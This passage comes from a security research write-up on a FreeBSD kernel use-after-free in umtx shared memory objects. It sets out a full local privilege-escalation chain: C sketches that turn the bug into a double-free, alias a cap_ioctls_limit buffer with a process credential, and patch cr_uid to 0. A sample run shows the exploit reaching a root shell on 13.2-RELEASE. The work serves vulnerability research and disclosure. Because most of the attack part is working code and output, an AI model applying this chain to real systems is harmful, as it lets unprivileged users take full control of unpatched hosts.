Looking at the size of struct shmfd, we can see that struct ucred comes from the same bucket — and ucreds are, astonishingly, allocated from the general purpose heap instead of a dedicated zone in FreeBSD:

user@freebsd:~ $ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (x86_64).
(lldb) p sizeof(struct shmfd)
(unsigned long) = 208
(lldb) p sizeof(struct ucred)
(unsigned long) = 256
shm_gid happens to overlap the cr_ref refcount field of ucred:
(lldb) p &((struct shmfd *)0)->shm_gid
(gid_t *) = 0x0000000000000020
(lldb) p &((struct ucred *)0)->cr_ref
(u_int *) = 0x0000000000000020
This means that by allocating into the shmfd hole with a ucred, we can change the refcount of that ucred to whatever our gid happens to be. By changing the refcount to be lower than it should be, we can then trigger a premature free of the ucred and reallocate a new credential of our choosing into that hole.
There are many ways to bump the refcount of a ucred; a simple technique is to create lots of threads. Each created thread will add to the refcount and reaping threads will take from it.
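A hedged sketch of that technique (each live thread holds a reference on the process credential, so spawning keeps cr_ref raised, and letting threads exit and reaping them lowers it again):

#include <pthread.h>
#include <unistd.h>

static volatile int release_refs;

/* Stays alive, holding a ucred reference, until told to exit. */
static void *
hold_cred_ref(void *arg)
{
    while (!release_refs)
        usleep(1000);
    return NULL;
}

static void
spawn_holders(pthread_t *tids, int n)
{
    for (int i = 0; i < n; i++)
        pthread_create(&tids[i], NULL, hold_cred_ref, NULL);
}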
While this strategy seems workable, it is somewhat brittle as it relies on these two structures always overlapping in a fruitful way. Rather than continue with this, I opted to focus on a different approach and instead turn the bug into a double-free. This provides us with a much richer exploitable state.
Expanding Options via Double-Free
The FreeBSD kernel does not detect double-frees. This is useful because if we're able to turn our use-after-free into a double-free, it expands the set of objects that we're able to alias: we would no longer be restricted to considering what can be manipulated through shm_ops, but instead through whichever other types we're able to combine.

The FreeBSD kernel heap allocator works in a LIFO fashion. This still applies to double-freed elements, too: if we free the same virtual address twice, then the next two allocations from malloc will return that same virtual address. This behaviour lets us alias any two objects that come from the same bucket.
In investigating how we might be able to free our dangling shmfd again, it's tempting to consider placing a fake shmfd using a kernel reallocation primitive (e.g. ioctl, as we used in Strategy Proof-of-Concept) and ensuring the shm_refs field is set to 1.

Then, by calling close on our file descriptor, we'll cause the kernel to call shm_close on our file, which simply does shm_drop on our prepared data:
void
shm_drop(struct shmfd *shmfd)
{
    vm_object_t obj;

    if (refcount_release(&shmfd->shm_refs)) {
#ifdef MAC
        mac_posixshm_destroy(shmfd);
#endif
        rangelock_destroy(&shmfd->shm_rl);
        mtx_destroy(&shmfd->shm_mtx);
        obj = shmfd->shm_object;
        if (!shm_largepage(shmfd)) {
            VM_OBJECT_WLOCK(obj);
            obj->un_pager.swp.swp_priv = NULL;
            VM_OBJECT_WUNLOCK(obj);
        }
        vm_object_deallocate(obj);
[1]     free(shmfd, M_SHMFD);
    }
}
We really just want to reach that free at [1], but in order to get there, the kernel will be interacting with various other fields, such as shm_object. shm_object is expected to be a legitimate kernel pointer and, since it's located before the shm_refs field, we're obliged to provide a value if we plan on placing a fake shmfd.

It turns out that there's a different route we can take to trigger this free at [1].
Recall that the vulnerability gives us a file descriptor with a dangling shmfd pointer. If we now do another UMTX_SHM_CREAT operation, then we will create a new umtx_shm_reg and a new shmfd:

- The umtx_shm_reg has a refcount of 1
- The shmfd has a refcount of 2
- Our dangling shmfd will point to the same address as this new shmfd

The shmfd has a refcount of 2 because UMTX_SHM_CREAT returns us a file descriptor. If we close that file descriptor, the shmfd will now have a refcount of 1.
We can now call close on our vulnerable file descriptor. That will call shm_close, which will call shm_drop on the dangling shmfd. Since the dangling shmfd now aliases the new shmfd we just created, this will free the new shmfd while keeping the umtx_shm_reg in the registry.

Now the umtx_shm_reg entry holds a dangling shmfd pointer.
Next we perform a UMTX_SHM_LOOKUP operation. Here's the relevant part of umtx_shm again:
static int
umtx_shm(struct thread *td, void *addr, u_int flags)
{
    struct umtx_key key;
    struct umtx_shm_reg *reg;
    struct file *fp;
    int error, fd;
    ...
[2] reg = umtx_shm_find_reg(&key);
    ...
    error = falloc_caps(td, &fp, &fd, O_CLOEXEC, NULL);
    if (error == 0) {
[3]     shm_hold(reg->ushm_obj);
        finit(fp, FFLAGS(O_RDWR), DTYPE_SHM, reg->ushm_obj,
            &shm_ops);
        td->td_retval[0] = fd;
        fdrop(fp, td);
    }
    ...
    umtx_shm_unref_reg(reg, false);
    return (error);
}
At [2], the kernel will find the umtx_shm_reg with the dangling shmfd and prepare a file descriptor for us. In setting up this file descriptor, it will call shm_hold on the freed data [3], bumping the refcount back from 0 to 1 again.

Finally, if we close the resulting file descriptor right away, we will reach shm_drop again, but this time with all of the legitimate kernel pointers still in place (since the freed memory wasn't zeroed).

We have now performed a double-free.
With this done, now is a good time to remove the umtx_shm_reg entry, since it still holds a dangling pointer to this double-freed memory. It's safe to perform a UMTX_SHM_DESTROY at this point since the shmfd refcount has returned to zero: in cleaning up the umtx_shm_reg, the refcount will drop again, but to -1 this time — which is safe.
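Putting the whole sequence together, a hedged sketch (uaf_fd is the dangling descriptor obtained from the race, key is the same key used throughout, and error handling is elided):

#include <sys/types.h>
#include <sys/umtx.h>
#include <unistd.h>

static void
double_free(int uaf_fd, void *key)
{
    int fd;

    /* The new shmfd is dispensed from the freed slot (LIFO). */
    fd = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_CREAT, key, NULL);
    close(fd);     /* new shmfd: refcount 2 -> 1 */

    close(uaf_fd); /* shm_drop: refcount 1 -> 0, first free */

    /* The lookup resurrects the freed shmfd (shm_hold: 0 -> 1)... */
    fd = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_LOOKUP, key, NULL);
    close(fd);     /* ...and shm_drop frees it a second time. */

    /* Retire the registry entry holding the dangling pointer. */
    _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_DESTROY, key, NULL);
}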
Now we are in a stable situation with a double-freed malloc256 element, since the size of a shmfd is 208 bytes.

What this means is that the next two allocations from the malloc256 bucket will return the same virtual address. By choosing which two allocations come from there next, we can choose two objects to overlap in a useful way.
Aliasing a cap_ioctls_limit Array with ucred

The cap_ioctls_limit syscall will be very useful here. The purpose of the syscall is to allow userland to specify an allowlist of permissible ioctl codes for an open file descriptor:
int
sys_cap_ioctls_limit(struct thread *td, struct cap_ioctls_limit_args *uap)
{
    u_long *cmds;
    size_t ncmds;
    int error;

    ncmds = uap->ncmds;
    if (ncmds > IOCTLS_MAX_COUNT)
        return (EINVAL);
    if (ncmds == 0) {
        cmds = NULL;
    } else {
[1]     cmds = malloc(sizeof(cmds[0]) * ncmds, M_FILECAPS, M_WAITOK);
[2]     error = copyin(uap->cmds, cmds, sizeof(cmds[0]) * ncmds);
        if (error != 0) {
            free(cmds, M_FILECAPS);
            return (error);
        }
    }
[3] return (kern_cap_ioctls_limit(td, uap->fd, cmds, ncmds));
}
We can see that the way this works is to malloc a user-controlled size [1], fill it with user-controlled content [2] and attach it to a file descriptor [3].

By calling cap_ioctls_limit with a zero-length buffer, we cause the kernel to free any previously-attached ioctl limit buffer.

With an ioctl limit buffer in place, we can even read its contents back with the cap_ioctls_get syscall.
This provides us with:
- The ability to allocate from a range of malloc buckets.
- The ability to fill that allocation with arbitrary data.
- The ability to read the contents of the buffer back.
- The ability to free that buffer whenever we want to.
This is an extremely powerful mechanism for controlling use-after-frees.
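In userland, the primitive looks something like this (a hedged sketch; fd is any descriptor we own, and since Capsicum may only allow an existing limit to be narrowed, a fresh descriptor per allocation is the safe pattern):

#include <string.h>
#include <sys/types.h>
#include <sys/capsicum.h>

/*
 * Sketch: a controlled 256-byte kernel allocation. 32 u_long entries
 * of 8 bytes each land in the malloc256 bucket.
 */
static void
kheap_roundtrip(int fd)
{
    u_long buf[32];

    memset(buf, 0x41, sizeof(buf));
    cap_ioctls_limit(fd, buf, 32); /* allocate and fill */
    cap_ioctls_get(fd, buf, 32);   /* read the contents back */
    cap_ioctls_limit(fd, NULL, 0); /* free the buffer */
}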
Armed with this knowledge, we will use an ioctl limit buffer as one of our allocations out of the double-freed address. Whichever other object we choose as the other allocation for the double-freed address, we will now be able to read its content through cap_ioctls_get and even free/replace it with calls to cap_ioctls_limit.
Looking at the size of a ucred credential structure, this seems like a perfect candidate to alias, since they will be allocated from the same bucket as the shmfd came from (and hence where our double-free is set up):

(lldb) p sizeof(struct shmfd)
(unsigned long) = 208
(lldb) p sizeof(struct ucred)
(unsigned long) = 256
With our double-freed element in place, the plan is then:

- Allocate once with cap_ioctls_limit.
- Allocate again with a ucred by calling setuid(getuid()) (this is allowed regardless of privilege and results in a new ucred allocation).
- Read the ucred structure through cap_ioctls_get.
- Fix up the cr_uid to be 0 and also increase the cr_ref refcount.
- Free the ioctl buffer with cap_ioctls_limit(NULL).
- Allocate that buffer back again with cap_ioctls_limit(&cred).
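A hedged sketch of that plan (error handling elided; fd_a and fd_b are two descriptors we own, and patch_cred is a hypothetical helper that edits the words overlapping cr_uid and cr_ref at the offsets for the target kernel):

#include <unistd.h>
#include <sys/types.h>
#include <sys/capsicum.h>

extern void patch_cred(u_long *cred); /* hypothetical helper */

static void
alias_and_patch(int fd_a, int fd_b)
{
    u_long cred[32];

    cap_ioctls_limit(fd_a, cred, 32); /* 1: first allocation into the slot */
    setuid(getuid());                 /* 2: a fresh ucred lands on top */
    cap_ioctls_get(fd_a, cred, 32);   /* 3: read the live ucred */
    patch_cred(cred);                 /* 4: set cr_uid to 0, bump cr_ref */
    cap_ioctls_limit(fd_a, NULL, 0);  /* 5: free the buffer */
    cap_ioctls_limit(fd_b, cred, 32); /* 6: write the patched ucred back */
}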
The net effect of this is that we've changed our process' credential:

- cr_uid is now 0, so we've become root.
- cr_ref has increased — which will be explained now.
Stopping here isn't enough because we're in a dangerous position: closing the
file descriptor associated with the ioctl
limit buffer will free our
process' credential, ultimately leading to a panic. We need to transition to
a stable state.
Since we're now root according to the kernel, we're free to allocate ourselves a better credential: we can call setresuid(0, 0, 0).
In doing this, the kernel will allocate a new ucred and drop the refcount on our previous one. Since we increased the cr_ref as part of our fix-up, this will prevent that ucred from being freed. Our process will now transition to the new full-root credential and away from the double-freed memory slot.

Finally, because the cr_ref didn't reach zero, our file descriptor's ioctl limit buffer holds the only reference to the double-freed slot — it's no longer double-freed, and so we've restored stability.
We can now call setresgid(0, 0, 0) to fully transition to a pure root credential, safely close the ioctl limit file descriptor and simply drop to a root shell.
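The closing moves, sketched (ioctl_limit_fd is a hypothetical name for the descriptor that owns the limit buffer):

#include <unistd.h>

static void
finish(int ioctl_limit_fd)
{
    /* By this point the kernel believes cr_uid == 0, so these succeed. */
    setresuid(0, 0, 0);    /* fresh root ucred, away from the bad slot */
    setresgid(0, 0, 0);
    close(ioctl_limit_fd); /* frees the slot our old ucred occupied */
    execl("/bin/sh", "sh", "-i", (char *)NULL);
}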
Reference Implementation
My reference implementation of the exploit discussed here works in the way described at the end of the previous section:
- We leverage the vulnerability to acquire a file descriptor with a dangling shmfd pointer.
- We create/destroy another SHM through UMTX_OP_SHM to create a double-free.
- We leverage the double-free to alias a cap_ioctls_limit buffer with a ucred struct.
- We use cap_ioctls_get and cap_ioctls_limit again to read/write the ucred in place.
- We transition to a full root credential and close any resources.
- Finally, we drop to /bin/sh -i as root.
Sample output running against a 13.2-RELEASE kernel that I happen to have:
user@freebsd:~/umtx $ uname -a
FreeBSD freebsd 13.2-RELEASE FreeBSD 13.2-RELEASE releng/13.2-n254617-525ecfdad597 GENERIC amd64
user@freebsd:~/umtx $ make && ./umtx
cc -Isrc -c src/kalloc.c -o src/kalloc.o
cc -Isrc -c src/main.c -o src/main.o
cc -Isrc -c src/uaf.c -o src/uaf.o
cc -Isrc -c src/util.c -o src/util.o
cc -Isrc -pthread -o umtx src/kalloc.o src/main.o src/uaf.o src/util.o
[+] racing to create dangling shmfd...
[+] success!
[+] creating umtx_shm_reg with dangling shmfd
[+] doing double-free
[+] allocating placeholder into double slot
[+] allocating cred into double slot
[+] read cred with uid=1001:
0c 4e 1d 81 ff ff ff ff 00 00 03 01 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
02 00 00 00 02 00 00 00 ff ff ff ff 00 00 00 00
00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 e9 03 00 00 e9 03 00 00
e9 03 00 00 02 00 00 00 e9 03 00 00 e9 03 00 00
00 38 31 4c 00 f8 ff ff 00 38 31 4c 00 f8 ff ff
50 70 90 81 ff ff ff ff c0 28 07 03 00 f8 ff ff
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
bc 10 17 68 00 f8 ff ff 10 00 00 00 e9 03 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[+] fixing up and replacing
[+] attempting to secure creds
[+] uid=0, gid=0
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# whoami
root
#
Stability
Empirical testing shows that the probability of failing and triggering a kernel panic largely depends on how busy the kernel heap is while triggering the race condition. This is to be expected, since assumptions are made about which objects will be dispensed from the heap at critical points.
The reference implementation of the exploit was adjusted to improve stability in this way: a first cut constantly created and reaped new threads (for Thread A, Thread B and Thread C) in a loop, but this resulted in fairly common panics.
Adjusting the exploit to use primitive synchronisation between the threads — thereby avoiding auxiliary use of the heap — has proven to stabilise exploitation.
I have not yet observed any panics as a result of this refactoring.
PoC Archive
Contact me for an early copy of the reference implementation; otherwise, I will publish it here publicly in the near future.